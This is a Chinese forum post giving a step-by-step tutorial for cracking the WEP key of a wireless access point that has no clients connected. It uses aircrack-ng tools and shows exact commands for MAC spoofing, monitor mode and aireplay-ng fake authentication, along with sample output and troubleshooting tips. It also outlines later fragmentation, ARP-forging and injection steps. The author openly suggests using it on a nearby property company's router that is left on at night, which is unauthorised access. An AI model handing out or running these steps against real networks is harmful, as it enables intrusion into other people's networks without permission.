主题 : 如何破解没有客户端连接的wep密码
级别: 二分秋色
UID: 1323
精华: 0
发帖: 72
威望: 360 点
无痕币: 4319 WHB
贡献值: 0 点
在线时间: 21(时)
注册时间: 2007-11-27
最后登录: 2018-05-16

0 如何破解没有客户端连接的wep密码

关于破解wep密码的教程已经很多,其工作原理是用aircrack-ng工具包通收集合法客户端上网时产生的大量数据包来进行破解,但是这个破解是建立在目标AP有活动客户端连接的基础上的,如果没有客户端或是客户端没有上网就会无法收集到足够的ivs数据,很多朋友在实验的时候失败的原因就是因为这个。本文旨在讨论破解无客户端连接的wep密码,毕竟现实生活中存在这样的情况的(比如我所在的小区物业管理公司,晚上时经常路由、猫没关,但是没人上网)。从而达到只要对方路由开着,无论有无客户端,客户端有无上网,你都能破解的效果。
一、实验环境
软件:操作系统(OS):wifiway0.8,工具:aircrack-ng(wifiway0.8自带,version:0.91)
硬件:dell640M,无线网卡:intel3945,mac:00:18:de:81:61:95
实验AP:贝尔金7231-4p,mac:00:90:96:00:00:01,工作频道6,essid:MyEHome(请注意大小写),已使用128位WEP加密。
二、实验方案
1、设置无线网卡MAC地址。
2、设置网卡为在指定的ap的工作频道的监控模式。
3、使用aireplay-ng在实验AP上产生虚假认证(fake authentication)。
4、使用fragmentation attack来获得PRGA。
5、使用上一步获得的PRGA用packetforge-ng工具来生成一个arp包。
6、用airodump-ng来收集需要的IVS数据
7、使用第四步得到的arp来注入攻击
8、用aircrack-ng破解
三:详细步骤
一、设置无线网卡mac地址
这一步你也可以省略,因为mac地址比较难记,所以可以用macchanger将网卡的mac设置为一个好记的地址,方便后面使用。打开一个终端窗口输入:wifiway:~#macchanger --mac wifi0 00:11:22:33:44:55(注意wifi0为我电脑无线网卡的接口名,你需要将其换为自己网卡的接口名,请使用iwconfig查看)
二、设置网卡为在指定的ap的工作频道的监控模式。
由于我的ap是工作在频道6上的(可以使用kismet等工具查看),
因此使用以下命令:
airmon-ng start wifi0 6使网卡监听频道6
这样网卡将启动监听模式,系统将反馈(mode monitor enabled)
你可用iwconfig来确认网卡监听模式已启动。
三、使用aireplay-ng来获得PRGA。
这是非常关键的一步。为让AP接受数据包,你必须使网卡和AP关联。如果没有关联的话,目标AP将忽略所有从你网卡发送的数据包,并发送回一个未认证消息(DeAuthentication packet),IVS数据将不会产生从而导致无法破解。在终端窗口下输入:
wifiway:~# aireplay-ng -1 0 -e MyEHome -a 00:90:96:00:00:01 -h 00:11:22:33:44:55 wifi0
参数解释:
-1 告诉aireplay使用fake authentication(虚假认证)
-e essid 告诉aireplay目标AP的essid,这里是MyEHome
-a bssid 告诉aireplay目标AP的bssid号,这里是00:90:96:00:00:01。
-h Mac 告诉aireplay我的网卡的mac地址,这里是我在第一步设置的00:11:22:33:44:55
Wifi0为网卡接口名,请注意换成自己的。
该命令如果成功,系统将显示:
20:22:20  Sending Authentication Request(前面的是时间)
20:22:20  Authentication successful
20:22:20  Sending Association Request
20:22:20  Association successful :-)
如果不能成功,系统可能显示:
20:28:02  Sending Authentication Request
20:28:02  Authentication successful
20:28:02  Sending Association Request
20:28:02  Association successful :-)
20:28:02  Got a deauthentication packet!
20:28:05  Sending Authentication Request
20:28:05  Authentication successful
20:28:05  Sending Association Request
20:28:10  Sending Authentication Request
20:28:10  Authentication successful
20:28:10  Sending Association Request
不能成功的原因很多,具体有如下几种:
1、目标AP做了MAC地址过滤
2、你离目标AP物理距离太远
3、对方使用了WPA加密
4、网卡不支持注入
5、网卡、AP可能不兼容,网卡没有使用和AP一样的工作频道
6、输入的ssid拼写有误,请注意检查
以下为没有成功时系统列出的可能失败原因:
Attack was unsuccessful. Possible reasons:
* Perhaps MAC address filtering is enabled.
* Check that the BSSID (-a option) is correct.
* Try to change the number of packets (-o option).
* The driver hasn't been patched for injection.
* This attack sometimes fails against some APs.
* The card is not on the same channel as the AP.
* Injection is not supported AT ALL on HermesI,Centrino, ndiswrapper and a few others chipsets.
* You're too far from the AP. Get closer, or lower
the transmit rate (iwconfig <iface> rate 1M).
你可以根据命令反馈消息来判断原因来尝试解决问题,比如获得一个合法的MAC并伪造MAC、使用-o参数设置发送包的个数、设置网卡到一个较低的rate、到离目标AP更近一点的地方^_^,但是请注意:如果这一步不能成功,下面的步骤请不要再尝试,都是无用功!
[ 此帖被都市小星星在2009-02-21 20:34重新编辑 ]
Total 0.074094(s) query 3, Time now is:03-29 14:26, Gzip enabled 粤ICP备07514325号-1
Powered by PHPWind v7.3.2 Certificate Code © 2003-13 秋无痕论坛